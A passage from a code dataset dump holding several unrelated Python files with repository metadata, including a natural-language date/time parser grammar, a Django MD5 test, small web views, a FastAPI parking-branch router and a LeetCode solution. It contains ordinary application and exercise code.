'01': 1,\n 'jan': 1,\n 'jan.': 1,\n 'january': 1,\n '2': 2,\n '02': 2,\n 'feb': 2,\n 'feb.': 2,\n 'february': 2,\n '3': 3,\n '03': 3,\n 'mar': 3,\n 'mar.': 3,\n 'march': 3,\n '4': 4,\n '04': 4,\n 'apr': 4,\n 'apr.': 4,\n 'april': 4,\n '5': 5,\n '05': 5,\n 'may': 5,\n '6': 6,\n '06': 6,\n 'jun': 6,\n 'jun.': 6,\n 'june': 6,\n '7': 7,\n '07': 7,\n 'jul': 7,\n 'jul.': 7,\n 'july': 7,\n '8': 8,\n '08': 8,\n 'aug': 8,\n 'aug.': 8,\n 'august': 8,\n '9': 9,\n '09': 9,\n 'sep': 9,\n 'sep.': 9,\n 'sept': 9,\n 'sept.': 9,\n 'september': 9,\n '10': 10,\n 'oct': 10,\n 'oct.': 10,\n 'october': 10,\n '11': 11,\n 'nov': 11,\n 'nov.': 11,\n 'november': 11,\n '12': 12,\n 'dec': 12,\n 'dec.': 12,\n 'december': 12\n }\n return m[month_str.lower()]\n\n\ndef quarter_mapping(quarter_parsed_expr):\n q = {\n 'q1': 1,\n 'q2': 2,\n 'q3': 3,\n 'q4': 4,\n 'first': 1,\n 'second': 2,\n 'third': 3,\n 'fourth': 4,\n }\n return q[str(quarter_parsed_expr).lower()]\n\n\ndef beginning_end_of_action(tokens):\n calc_time = utc_today()\n bound = {\n 'beginning': _BEGINNING,\n 'start': _BEGINNING,\n 'early': _BEGINNING,\n 'middle': _MIDDLE,\n 'mid': _MIDDLE,\n 'end': _END,\n 'late': _END,\n }[tokens.get('bound')]\n if 'calculatedTime' in tokens and isinstance(tokens['calculatedTime'], TimeInterval):\n if bound is _BEGINNING:\n calc_time = tokens['calculatedTime'].get_start()\n elif bound is _MIDDLE:\n delta = tokens['calculatedTime'].get_end() - tokens['calculatedTime'].get_start()\n calc_time = tokens['calculatedTime'].get_start() + delta // 2\n elif bound is _END:\n calc_time = tokens['calculatedTime'].get_end()\n elif 'name' in tokens:\n calc_time += {\n 'yesterday': datetime.timedelta(days=-1),\n 'today': datetime.timedelta(days=0),\n 'tomorrow': datetime.timedelta(days=1)\n }[tokens.name]\n tokens['calculatedTime'] = calc_time\n\n\ndef half_of_action(tokens):\n calc_time = utc_today()\n first = tokens['half'] in ['first', 'earlier']\n if 'calculatedTime' in tokens and isinstance(tokens['calculatedTime'], TimeInterval):\n if first:\n calc_time = tokens['calculatedTime'].get_first_half()\n else:\n calc_time = tokens['calculatedTime'].get_second_half()\n elif 'name' in tokens:\n calc_time += {\n 'yesterday': datetime.timedelta(days=-1),\n 'today': datetime.timedelta(days=0),\n 'tomorrow': datetime.timedelta(days=1)\n }[tokens.name]\n tokens['calculatedTime'] = calc_time\n\n\n@tz_decorate('calculatedTime', rel_hour=8)\ndef asap_action(_, origin=None):\n calc = datetime.datetime(origin.year, origin.month, origin.day) + datetime.timedelta(hours=8)\n return calc + (datetime.timedelta(days=1) if utc_now().hour >= 8 else datetime.timedelta(\n days=0))\n\n\ndef interval_year_action(tokens): # TODO: set an interval timezone decoration\n origin = utc_today()\n if 'dir_rel' in tokens:\n calc_time = year_interval(origin.year + tokens.dir_rel)\n elif 1900 < int(tokens.get('year', 0)) - _CENTURY_CHANGE <= 2000:\n calc_time = year_interval(int(tokens.year))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\ndef interval_quarter_action(tokens, origin=None): # TODO: set an interval timezone decoration\n if origin is None:\n origin = utc_today()\n if 'dir_rel' in tokens:\n rel_date = origin + relativedelta(months=3 * tokens.dir_rel)\n calc_time = quarter_interval(quarter_by_date(origin=rel_date), rel_date.year)\n elif 'quarter' in tokens:\n calc_time = quarter_interval(quarter_mapping(tokens.quarter),\n int(tokens.get('year', origin.year)))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\n# TODO: add last and next occurrence of the month when year is unclear\n# TODO: set an interval timezone decoration\ndef interval_month_action(tokens):\n origin = utc_today()\n if 'dir_rel' in tokens:\n rel_date = origin + relativedelta(months=tokens.dir_rel)\n calc_time = month_interval(rel_date.month, rel_date.year)\n elif 'month' in tokens:\n calc_time = month_interval(month_mapping(tokens.month), int(tokens.get('year',\n origin.year)))\n else:\n return\n tokens['calculatedTime'] = calc_time\n\n\ndef now_action(tokens):\n now = utc_now()\n if 'time_unit' in tokens:\n unit = tokens.time_unit.lower().rstrip('s')\n delta = {\n 'hour': datetime.timedelta(hours=tokens.qty * tokens.dir_abs),\n 'minute': datetime.timedelta(minutes=tokens.qty * tokens.dir_abs),\n 'second': datetime.timedelta(seconds=tokens.qty * tokens.dir_abs),\n }[unit]\n else:\n delta = datetime.timedelta()\n tokens['utc'] = True\n tokens['calculatedTime'] = now + delta\n\n\n@tz_decorate('calculatedTime')\ndef named_day_action(tokens, origin=None):\n day = origin\n if 'date' in tokens:\n day = tokens.date\n if 'time_unit' in tokens:\n unit = tokens.time_unit.lower().rstrip('s')\n delta = {\n 'year': relativedelta(years=tokens.qty * tokens.dir_abs),\n 'month': relativedelta(months=tokens.qty * tokens.dir_abs),\n 'week': datetime.timedelta(weeks=tokens.qty * tokens.dir_abs),\n 'day': datetime.timedelta(days=tokens.qty * tokens.dir_abs),\n }[unit]\n else:\n delta = datetime.timedelta()\n if 'time_of_day' in tokens:\n if isinstance(tokens.time_of_day, datetime.time):\n parsed_time = tokens.time_of_day\n elif tokens.time_of_day in ['noon', 'midnight']:\n parsed_time = {\n 'noon': datetime.time(12),\n 'midnight': datetime.time(0),\n }[tokens.time_of_day]\n elif 'hour' in tokens:\n parsed_time = convert_to_time(tokens)\n else:\n parsed_time = utc_now().time()\n else:\n parsed_time = None\n if parsed_time is not None:\n if day is not None:\n return datetime.datetime.combine(day + delta, parsed_time)\n return parsed_time + delta\n return day + delta\n\n\n@tz_decorate('calculatedTime')\ndef last_this_next_action(tokens, origin=None):\n return datetime.datetime.combine(origin + datetime.timedelta(days=tokens[0]), tokens[1])\n\n\ndef am_pm_time_to_full(tokens):\n tokens['hour'] = int(tokens['hour']) % 12\n if 'pm' in tokens:\n tokens['hour'] += 12\n return tokens\n\n\ndef o_clock_time_to_full(tokens):\n tokens['hour'] = int(tokens['hour']) % 12\n if tokens['hour'] < 7: # Assumption: o'clock times between 7-18\n tokens['hour'] += 12\n return tokens\n\n\n# Grammar used to parse different times is defined below\n\nthe_ = utils.caseless_keyword('the')\nto_ = utils.caseless_keyword('to')\nto_dash_ = utils.caseless_keyword_or(['to', '-'])\nat_ = utils.caseless_keyword_or(['at', '@'])\nand_ = utils.caseless_keyword('and')\nby_ = utils.caseless_keyword('by')\naround_ = utils.caseless_keyword('around')\nof_ = utils.caseless_keyword('of')\non_ = utils.caseless_keyword('on')\nof_dash_ = utils.caseless_keyword_or(['of', '-'])\ntime_ = utils.caseless_keyword('time')\no_clock = utils.caseless_keyword_or(['o\\'clock', 'oclock', 'o clock'])\nbetween_ = utils.caseless_keyword('between')\n\nin_ = utils.caseless_keyword('in').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nfrom_ = utils.caseless_keyword('from').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nbefore_ = utils.caseless_keyword('before').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_abs')\nafter_ = utils.caseless_keyword('after').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_abs')\nago_ = utils.caseless_keyword('ago').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_abs')\n\nnext_ = utils.caseless_keyword('next').setParseAction(\n pyparsing.replaceWith(1)).setResultsName('dir_rel')\nlast_ = utils.caseless_keyword('last').setParseAction(\n pyparsing.replaceWith(-1)).setResultsName('dir_rel')\nthis_ = utils.caseless_keyword('this').setParseAction(\n pyparsing.replaceWith(0)).setResultsName('dir_rel')\n\nnoon_ = utils.caseless_keyword('noon')\nmidnight_ = utils.caseless_keyword('midnight')\nnow_ = utils.caseless_keyword('now')\n\ndawn = utils.caseless_keyword('dawn').setParseAction(lambda tokens: datetime.time(5))\nsunrise = utils.caseless_keyword('sunrise').setParseAction(lambda tokens: datetime.time(6))\nmorning = utils.caseless_keyword('morning').setParseAction(lambda tokens: datetime.time(9))\nAM = pyparsing.Regex(r'a(\\. ?)?m\\.?', re.IGNORECASE).setParseAction(lambda tokens: datetime.time(9))\nafternoon = utils.caseless_keyword('afternoon').setParseAction(lambda tokens: datetime.time(14))\nPM = pyparsing.Regex(r'p(\\. ?)?m\\.?',\n re.IGNORECASE).setParseAction(lambda tokens: datetime.time(14))\ndusk = utils.caseless_keyword('dusk').setParseAction(lambda tokens: datetime.time(17))\nsunset = utils.caseless_keyword('sunset').setParseAction(lambda tokens: datetime.time(18))\neod = utils.caseless_keyword('eod').setParseAction(lambda tokens: datetime.time(18))\nevening = utils.caseless_keyword('evening').setParseAction(lambda tokens: datetime.time(19))\nnight = utils.caseless_keyword('night').setParseAction(lambda tokens: datetime.time(21))\ntonight = (pyparsing.Empty().setParseAction(pyparsing.replaceWith(0)) +\n utils.caseless_keyword('tonight').setParseAction(lambda tokens: datetime.time(21)))\n\nyear_ = utils.pluralize('year', pyparsing_regex=True)\nquarter_ = utils.pluralize('quarter', pyparsing_regex=True)\nmonth_ = utils.pluralize('month', pyparsing_regex=True)\nweek_ = utils.pluralize('week', pyparsing_regex=True)\nday_ = utils.pluralize('day', pyparsing_regex=True)\nhour_ = utils.pluralize('hour', pyparsing_regex=True)\nminute_ = utils.pluralize('minute', pyparsing_regex=True)\n_second_ = utils.pluralize('second', pyparsing_regex=True)\n\n# TODO: Use some NLP tool to disambiguate some months (e.g. `may` verb or noun)\n# if this causes any issues\nmonths = pyparsing.Regex(\n r'\\b('\n r'jan(uary|\\.)?'\n r'|feb(ruary|\\.)?'\n r'|mar(ch|\\.)?'\n r'|apr(il|\\.)?'\n r'|may'\n r'|jun(e|\\.)?'\n r'|jul(y|\\.)?'\n r'|aug(ust|\\.)?'\n r'|sep(t(ember|\\.)?|\\.)?'\n r'|oct(ober|\\.)?'\n r'|nov(ember|\\.)?'\n r'|dec(ember|\\.)?'\n r')\\b', re.IGNORECASE)\n\n# TODO: Use some NLP tool to disambiguate some months (e.g. `may` verb or noun)\n# if this causes any issues\nmonths_no_spaces = pyparsing.Regex(\n r'('\n r'jan(uary|\\.)?'\n r'|feb(ruary|\\.)?'\n r'|mar(ch|\\.)?'\n r'|apr(il|\\.)?'\n r'|may'\n r'|jun(e|\\.)?'\n r'|jul(y|\\.)?'\n r'|aug(ust|\\.)?'\n r'|sep(t(ember|\\.)?|\\.)?'\n r'|oct(ober|\\.)?'\n r'|nov(ember|\\.)?'\n r'|dec(ember|\\.)?'\n r')\\b', re.IGNORECASE)\n\nday_name = pyparsing.Regex(\n r'\\b('\n r'mon(day|\\.)?'\n r'|tue(s(day|\\.)?|\\.)?'\n r'|wed(nesday|\\.)?'\n r'|thu(rs(day|\\.)?|\\.)?'\n r'|fri(day|\\.)?'\n r'|sat(urday|\\.)?'\n r'|sun(day|\\.)?'\n r')\\b', re.IGNORECASE)\nday_name = day_name.setResultsName('day_name')\n\nordinal_day = pyparsing.Regex(r'\\b('\n r'[23]0th'\n r'|[23]?(1st|2nd|3rd|[4-9]th)'\n r'|1\\dth'\n r')\\b', re.IGNORECASE)\n\ndate_separators = ['/', '-', '.']\n\ncouple = (Optional(utils.caseless_keyword('a')) + utils.caseless_keyword('couple') + Optional(of_))\ncouple.setParseAction(pyparsing.replaceWith(2))\n\na_qty = pyparsing.Regex(r'\\ban?\\b', re.IGNORECASE).setParseAction(pyparsing.replaceWith(1))\n\ninteger = pyparsing.Word(pyparsing.nums).setParseAction(lambda token: int(token[0]))\ninteger_month = pyparsing.Regex(r'\\b(1[012]|0?[1-9])\\b')\ninteger_day = pyparsing.Regex(r'\\b(3[01]|[1-2]\\d|0?[1-9])\\b')\ninteger_month_two_digits_no_trailing_space = pyparsing.Regex(r'\\b(1[012]|0[1-9])')\ninteger_day_no_trailing_space = pyparsing.Regex(r'\\b(3[01]|[1-2]\\d|0?[1-9])')\ninteger_day_two_digits_no_leading_space = pyparsing.Regex(r'(3[01]|[1-2]\\d|0[1-9])\\b')\n\nqty = integer | couple | a_qty | units\nqty = qty.setResultsName('qty')\n\nyear4 = pyparsing.Regex(r'\\b\\d{4}\\b').setResultsName('year')\nyear2 = pyparsing.Regex(r'\\b\\d{2}\\b').setParseAction(process_two_digits_year).setResultsName('year')\nyear = pyparsing.MatchFirst([year4, year2])\n\ndate_sep = Optional(pyparsing.Regex(r'[/\\-\\. ]'))\nyear_sep = Optional(pyparsing.Regex(r'[/\\-\\. ,]'))\n\nmonth = pyparsing.MatchFirst([integer_month, months])\nmonth = month.setResultsName('month')\n\nday_spec = pyparsing.MatchFirst([integer_day, ordinal_day])\nday_spec = day_spec.setResultsName('day')\n\ndate_day = pyparsing.MatchFirst([day_name + Optional(the_),\n the_]) \\\n + ordinal_day('day')\n\ndate_ymd = year4\\\n + pyparsing.MatchFirst([SEP_SYM + month + SEP_SYM for SEP_SYM in date_separators])\\\n + day_spec\n\ndate_mdy = pyparsing.MatchFirst([\n month + date_sep + Optional(the_) + day_spec +\n Optional(year_sep + year + pyparsing.NotAny(':')),\n integer_month_two_digits_no_trailing_space('month') +\n integer_day_two_digits_no_leading_space('day')\n])\n\nignore_date_ydm = year4 + pyparsing.MatchFirst(\n [SEP_SYM + day_spec + SEP_SYM for SEP_SYM in date_separators]) + month\n\ndate_day_month = pyparsing.MatchFirst([\n day_spec + Optional(of_dash_) + month,\n integer_day_no_trailing_space('day') + months_no_spaces('month')\n])\n\ndate = pyparsing.MatchFirst([\n Optional(day_name + Optional(',')) + pyparsing.MatchFirst([date_ymd, date_mdy, date_day_month]),\n date_day\n])\ndate.setParseAction(convert_to_date)\n\nnamed_day = utils.caseless_keyword_or(['yesterday', 'today', 'tomorrow']).setResultsName('name')\n\nweekday_ref = Optional(Optional(this_).suppress() + last_ | this_ | next_)('dir_rel') + day_name\nweekday_ref = weekday_ref.setResultsName('weekday_ref')\n\nday_ref = named_day | weekday_ref\nday_ref.setParseAction(convert_to_day)\n\npart_of_day = pyparsing.MatchFirst(\n [morning, dawn, sunrise, AM, afternoon, PM, dusk, sunset, evening, eod, night])\npart_of_day = part_of_day.setResultsName('part_of_day')\n\nfull_hours = pyparsing.Regex(r'\\b(2[0-3]|(1|0?)[0-9])').setResultsName('hour')\nam_pm_hours = pyparsing.Regex(r'\\b(1[0-2]|0?[1-9])').setResultsName('hour')\nminutes = pyparsing.Regex(r'[0-5][0-9]').setResultsName('minute')\nseconds = pyparsing.Regex(r'[0-5][0-9]').setResultsName('second')\n\nam = pyparsing.Regex(r'a(\\. ?)?m\\.?\\b', re.IGNORECASE).setResultsName('am')\npm = pyparsing.Regex(r'p(\\. ?)?m\\.?\\b', re.IGNORECASE).setResultsName('pm')\n\ntimezone = utils.caseless_keyword_or([\n 'Eastern', 'Central', 'Mountain', 'Pacific', 'EST', 'CST', 'MST', 'PST', 'EDT', 'CDT', 'MDT',\n 'PDT', 'ET', 'CT', 'MT', 'PT'\n])\n\nfull_time = full_hours + ':' + minutes + Optional(':' + seconds)\nam_pm_time = am_pm_hours + Optional(':' + minutes + Optional(':' + seconds)) + pyparsing.MatchFirst(\n [am, pm])\nam_pm_time.setParseAction(am_pm_time_to_full)\no_clock_time = am_pm_hours + o_clock\no_clock_time.setParseAction(o_clock_time_to_full)\n\nhms_time = Optional(at_) + pyparsing.MatchFirst([o_clock_time, am_pm_time, full_time\n ]) + Optional(timezone)\n\nthis_time = (this_ + time_).setResultsName('this_time')\n\ntime_of_day = pyparsing.MatchFirst([\n Optional(at_ | around_).suppress() + pyparsing.MatchFirst(\n [this_time, hms_time, noon_, midnight_, dusk, dawn, sunrise, sunset, night]),\n Optional(Optional(in_) + the_).suppress() +\n pyparsing.MatchFirst([morning, afternoon, evening, night]),\n Optional(by_).suppress() + eod\n])\ntime_of_day = time_of_day.setResultsName('time_of_day')\n\nrelative_date_unit = (year_ | month_ | week_ | day_)('time_unit')\nrelative_time_unit = (hour_ | minute_ | _second_)('time_unit')\nrelative_datetime_unit = (relative_date_unit | relative_time_unit)\n\nnow_datetime_spec = pyparsing.MatchFirst([\n now_,\n Optional(in_) + qty + relative_time_unit + from_ + now_,\n qty + relative_time_unit + (ago_ | before_ + now_),\n in_ + qty + relative_time_unit,\n])\nnow_datetime_spec.setParseAction(now_action)\n\nnamed_day_date_spec = pyparsing.MatchFirst([\n Optional(in_) + qty + relative_date_unit + from_ + now_,\n qty + relative_date_unit + (ago_ | before_ + now_),\n in_ + qty + relative_date_unit + Optional(time_of_day),\n])\nnamed_day_date_spec.setParseAction(named_day_action)\n\nlast_this_next_interval = pyparsing.MatchFirst([\n Optional(Optional(the_) + day_spec('day') + of_) + (last_ | this_ | next_) +\n (week_ | month_)('time_unit'),\n Optional(months('month')) + (last_ | this_ | next_) + year_('time_unit')\n])\nlast_this_next_interval.setParseAction(convert_to_interval)\nlast_this_next_interval = last_this_next_interval.setResultsName('calculatedTime')\n\ndatetime_spec = Optional(last_this_next_interval) \\\n + pyparsing.MatchFirst([\n time_of_day + Optional(Optional(of_ | on_) + (date | day_ref)),\n (date | day_ref) + Optional(Optional(',') + time_of_day)\n ])\ndatetime_spec.setParseAction(convert_to_abs_time, calculate_time)\n\nrel_time_spec = Optional(in_) + qty + relative_datetime_unit + (from_ | before_\n | after_) + datetime_spec\nrel_time_spec.setParseAction(convert_to_timedelta, calculate_time)\n\nlast_this_next_part_of_day = pyparsing.MatchFirst([\n tonight,\n (last_ | this_ | next_) + part_of_day,\n])\nlast_this_next_part_of_day.setParseAction(last_this_next_action)\n\ninterval_year = year('year')\ninterval_year.setParseAction(interval_year_action)\n\ninterval_year4 = Optional('$')('datetime_parsing_error') + year4('year')\ninterval_year4.setParseAction(interval_year_action)\n\nquarter_name = pyparsing.Regex(r'\\bQ[1234]\\b', re.IGNORECASE)\ninterval_quarter = pyparsing.MatchFirst([\n pyparsing.MatchFirst([\n quarter_name('quarter'),\n utils.caseless_keyword_or(['first', 'second', 'third', 'fourth'])('quarter') + quarter_\n ]) + Optional(year),\n (last_ | this_ | next_)('dir_rel') + quarter_,\n])\ninterval_quarter.setParseAction(interval_quarter_action)\n\ninterval_month = months('month') + Optional(Optional(',') + year)\ninterval_month.setParseAction(interval_month_action)\n\nthis_placeholder = pyparsing.Empty()('dir_rel').setParseAction(lambda: 0)\ninterval = pyparsing.MatchFirst([\n interval_month, interval_quarter, interval_year, last_this_next_interval, named_day,\n (this_placeholder + relative_date_unit)('calculatedTime').setParseAction(convert_to_interval)\n])\n\nbeginning_end_of = pyparsing.MatchFirst([\n utils.caseless_keyword_or(['beginning', 'start', 'middle', 'end'])('bound') + of_,\n utils.caseless_keyword_or(['early', 'late'])('bound'),\n utils.caseless_keyword('mid')('bound') + Optional(of_dash_)\n]) + interval\nbeginning_end_of.setParseAction(beginning_end_of_action)\n\nhalf_of = (utils.caseless_keyword_or(['earlier', 'first', 'later', 'second'])('half')) +\\\n utils.caseless_keyword('half') + Optional(of_dash_) + interval\nhalf_of.setParseAction(half_of_action)\n\nasap = utils.caseless_keyword('asap')\nasap.setParseAction(asap_action)\n\nbefore_after_datetime_object = pyparsing.MatchFirst([\n (between_ + datetime_spec)('inclusive_start') + (and_ + datetime_spec)('inclusive_end'),\n (Optional(from_) + datetime_spec)('inclusive_start') +\n (to_dash_ + datetime_spec)('inclusive_end'),\n (after_ + datetime_spec)('exclusive_start') + Optional(\n (before_ + datetime_spec)('exclusive_end')),\n (before_ + datetime_spec)('exclusive_end') + Optional(\n (after_ + datetime_spec)('exclusive_start')),\n])\nbefore_after_datetime_object.setParseAction(before_after_any)\n\nignore_greetings = 'good' + (morning | afternoon | evening | night)\n\ndelta_time = pyparsing.MatchFirst([\n ignore_greetings.suppress(\n ), # Allows multiple refactors related to morning/afternoon/evening/night keywords\n beginning_end_of,\n half_of,\n before_after_datetime_object,\n datetime_spec,\n rel_time_spec,\n last_this_next_interval + pyparsing.NotAny(datetime_spec),\n named_day_date_spec,\n now_datetime_spec,\n last_this_next_part_of_day,\n ignore_date_ydm.suppress(), # Required to prevent extracting a fragment of an invalid date\n interval_quarter,\n interval_month,\n interval_year4,\n asap,\n])\ndelta_time.addParseAction(set_datetime)\n","repo_name":"Zapship/kronosparser","sub_path":"kronosparser/time_parser.py","file_name":"time_parser.py","file_ext":"py","file_size_in_byte":34692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"6304204275","text":"from django.db import connection\nfrom django.db.models import CharField\nfrom django.db.models.functions import MD5\nfrom django.test import TestCase\nfrom django.test.utils import register_lookup\n\nfrom ..models import Author\n\n\nclass MD5Tests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Author.objects.bulk_create(\n [\n Author(alias=\"John Smith\"),\n Author(alias=\"Jordan Élena\"),\n Author(alias=\"皇帝\"),\n Author(alias=\"\"),\n Author(alias=None),\n ]\n )\n\n def test_basic(self):\n authors = (\n Author.objects.annotate(\n md5_alias=MD5(\"alias\"),\n )\n .values_list(\"md5_alias\", flat=True)\n .order_by(\"pk\")\n )\n self.assertSequenceEqual(\n authors,\n [\n \"6117323d2cabbc17d44c2b44587f682c\",\n \"ca6d48f6772000141e66591aee49d56c\",\n \"bf2c13bc1154e3d2e7df848cbc8be73d\",\n \"d41d8cd98f00b204e9800998ecf8427e\",\n \"d41d8cd98f00b204e9800998ecf8427e\"\n if connection.features.interprets_empty_strings_as_nulls\n else None,\n ],\n )\n\n def test_transform(self):\n with register_lookup(CharField, MD5):\n authors = Author.objects.filter(\n alias__md5=\"6117323d2cabbc17d44c2b44587f682c\",\n ).values_list(\"alias\", flat=True)\n self.assertSequenceEqual(authors, [\"John Smith\"])\n","repo_name":"django/django","sub_path":"tests/db_functions/text/test_md5.py","file_name":"test_md5.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"6782806225","text":"import math \r\ndef isGoodArray(nums):\r\n n = len(nums)\r\n #if there is just the number '1' in nums return true\r\n if n == 1:\r\n return nums[0] == 1\r\n #calc the first gcd\r\n d = math.gcd(nums[0], nums[1])\r\n #all we have to see is if there is a combination with gcd = 1\r\n for num in nums:\r\n d = math.gcd(num, d)\r\n return d == 1\r\n\r\nprint(isGoodArray([3,6,7,3,1,2,10]))\r\n\r\n\r\n\"\"\" Bézout's identity: gcd(a,b) = d -> f(x,y) | ax + by = d \"\"\"\r\n# https://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity","repo_name":"NatiMoshe/LeetCode","sub_path":"1250. Check If It Is a Good Array.py","file_name":"1250. Check If It Is a Good Array.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37648197163","text":"from django.shortcuts import render, redirect\nfrom .models import Comment, Message\nfrom login_app.models import User\n\n# Create your views here.\ndef message(request):\n logged_user = User.objects.get(id = request.session[\"user_id\"])\n new_message = Message.objects.create(user = logged_user, content = request.POST[\"message_content\"])\n \n return redirect(\"/wall/\")\n\ndef comment(request):\n logged_user = User.objects.get(id = request.session[\"user_id\"])\n current_message = Message.objects.get(id=request.POST[\"message_id\"])\n new_comment = Comment.objects.create(message = current_message, user = logged_user, content = request.POST[\"comment_content\"])\n return redirect(\"/wall/\")\n\ndef delete_message(request):\n Message.objects.get(id = request.POST['message_id']).delete()\n return redirect(\"/wall/\")\n","repo_name":"MNeipp/django","sub_path":"the_wall/wall_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12096621539","text":"import json\n\nfrom fatgoose3.extractors import BaseExtractor\n\nKNOWN_SCHEMA_TYPES = (\n \"ReportageNewsArticle\",\n \"NewsArticle\",\n \"Article\"\n)\n\n\nclass SchemaExtractor(BaseExtractor):\n\n def extract(self):\n node = self.article.doc\n metas = self.parser.getElementsByTag(node, 'script', attr='type',\n value='application/ld\\\\+json')\n for meta in metas:\n try:\n content = json.loads(meta.text_content())\n if isinstance(content, list):\n for context in content:\n if (context[\"@context\"] == \"http://schema.org\" and\n context[\"@type\"] in KNOWN_SCHEMA_TYPES):\n return content\n elif isinstance(content, dict):\n if (content[\"@context\"] == \"http://schema.org\" and\n content[\"@type\"] in KNOWN_SCHEMA_TYPES):\n return content\n except (ValueError, KeyError):\n # If the contents are not proper JSON or a key we expect\n # to exist does not, continue to the next tag.\n continue\n return None\n","repo_name":"862187570/fatgoose3","sub_path":"fatgoose3/extractors/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"8765645739","text":"from fastapi.routing import APIRouter\nimport schemas\nfrom routers.config import engine\nimport json\nfrom routers import Response\nfrom typing import Optional\nfrom fastapi import Query\n\nrouter=APIRouter(prefix=\"/branchWorkingHrs\",tags=['branchWorkingHrs'])\n\n@router.get('')\ndef getBranchWorkingHrs(branchId:Optional[int]=Query(None),parkingOwnerId:Optional[int]=Query(None)):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[getBranchWorkingHrs] ?,?\"\"\",(branchId,parkingOwnerId))\n rows=result.fetchone()\n result.close()\n if rows[0]:\n return {\"statusCode\": 1, \"response\": json.loads(rows[0]) if rows[0] != None else []}\n else:\n return Response(\"NotFound\")\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}\n\n@router.post('')\ndef postBranchWorkingHrs(request:schemas.BranchWorkingHrs):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[postBranchWorkingHrs]\n @branchId =?,\n @parkingOwnerId =?,\n @workingDay =?,\n @fromTime =?,\n @toTime =?,\n @isHoliday =?,\n @createdBy =?\"\"\",\n (\n request.branchId,\n request.parkingOwnerId,\n request.workingDay,\n request.fromTime,\n request.toTime,\n request.isHoliday,\n request.createdBy))\n rows=result.fetchall()\n return{\"statusCode\":int(rows[0][1]),\"response\":rows[0][0]}\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}\n\n\n@router.put('')\ndef putbranchWorkingHrs(request:schemas.PutBranchWorkingHrs):\n try:\n with engine.connect() as cur:\n result=cur.execute(f\"\"\"EXEC [dbo].[putBranchWorkingHrs]\n @uniqueId=?,\n @branchId =?,\n @parkingOwnerId =?,\n @workingDay =?,\n @fromTime =?,\n @toTime =?,\n @isHoliday =?,\n @updatedBy =?\"\"\",\n (\n request.uniqueId,\n request.branchId,\n request.parkingOwnerId,\n request.workingDay,\n request.fromTime,\n request.toTime,\n request.isHoliday,\n request.updatedBy))\n rows=result.fetchall()\n return{\"statusCode\":int(rows[0][1]),\"response\":rows[0][0]}\n except Exception as e:\n print(\"Exception Error\",str(e))\n return{\"statusCode\":0,\"response\":\"Server Error\"}","repo_name":"chinnies350/smartparkingdev","sub_path":"routers/branchWorkingHrs.py","file_name":"branchWorkingHrs.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72486329068","text":"from pathlib import Path\r\nimport os\r\n'''----------------------------------------\r\n| Created by Kathryn Reese |\r\n| Class: Average Size |\r\n| Determines the average sizes of |\r\n| Geotiff's and shp files. |\r\n|------------------------------------------|\r\n'''\r\nclass average_size:\r\n def get_average(self, directory, num_images):\r\n dir = Path(directory)\r\n average_sz = 0\r\n num_files = 0\r\n units = \"kb\"\r\n img_num = 0\r\n for file in dir.glob('*.shp*'):\r\n if(img_num < num_images):\r\n average_sz += os.path.getsize(file)\r\n num_files += 1\r\n img_num += 1\r\n\r\n for file in dir.glob('*.tif*'):\r\n if(img_num < num_images):\r\n average_sz += os.path.getsize(file)\r\n num_files += 1\r\n units = \"gb\"\r\n img_num += 1\r\n\r\n average_sz = average_sz / num_files\r\n if(units == \"kb\"):\r\n print(str(average_sz) + \" bytes\")\r\n kilobytes = average_sz / (2 ** 10)\r\n return str(kilobytes) + \" kb\", average_sz\r\n if(units == \"gb\"):\r\n print(str(average_sz) + \" bytes\")\r\n gigabytes = average_sz / (2 ** 30)\r\n return str(gigabytes) + \" gb\", average_sz\r\n\r\n\r\ndef main():\r\n avsz = average_size()\r\n gigabytes, byt = avsz.get_average(\"Original_Images\", 200)\r\n kilabytes, byt2 = avsz.get_average(\"Applied_Images/Shape Files\", 200)\r\n print(gigabytes)\r\n print(kilabytes)\r\n print(str(byt2/byt) + \" bytes\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"kat09tails/FireContourResearch","sub_path":"average_size.py","file_name":"average_size.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20196650102","text":"class TrieNode:\n def __init__(self):\n self.children = [None]*26\n self.eow = False\nclass Trie:\n def __init__(self):\n self.root = TrieNode()\n \n def insert(self, word: str) -> None:\n root = self.root\n size = len(word)\n for i in range(size):\n idx = ord(word[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n root.children[idx] = TrieNode()\n root = root.children[idx]\n root.eow = True\n\n def search(self, word: str) -> bool:\n # print(self.root)\n root = self.root\n size = len(word)\n for i in range(size):\n idx = ord(word[i])-ord('a')\n if root.children[idx]:\n root = root.children[idx]\n else:\n return False\n return root.eow\n\n def 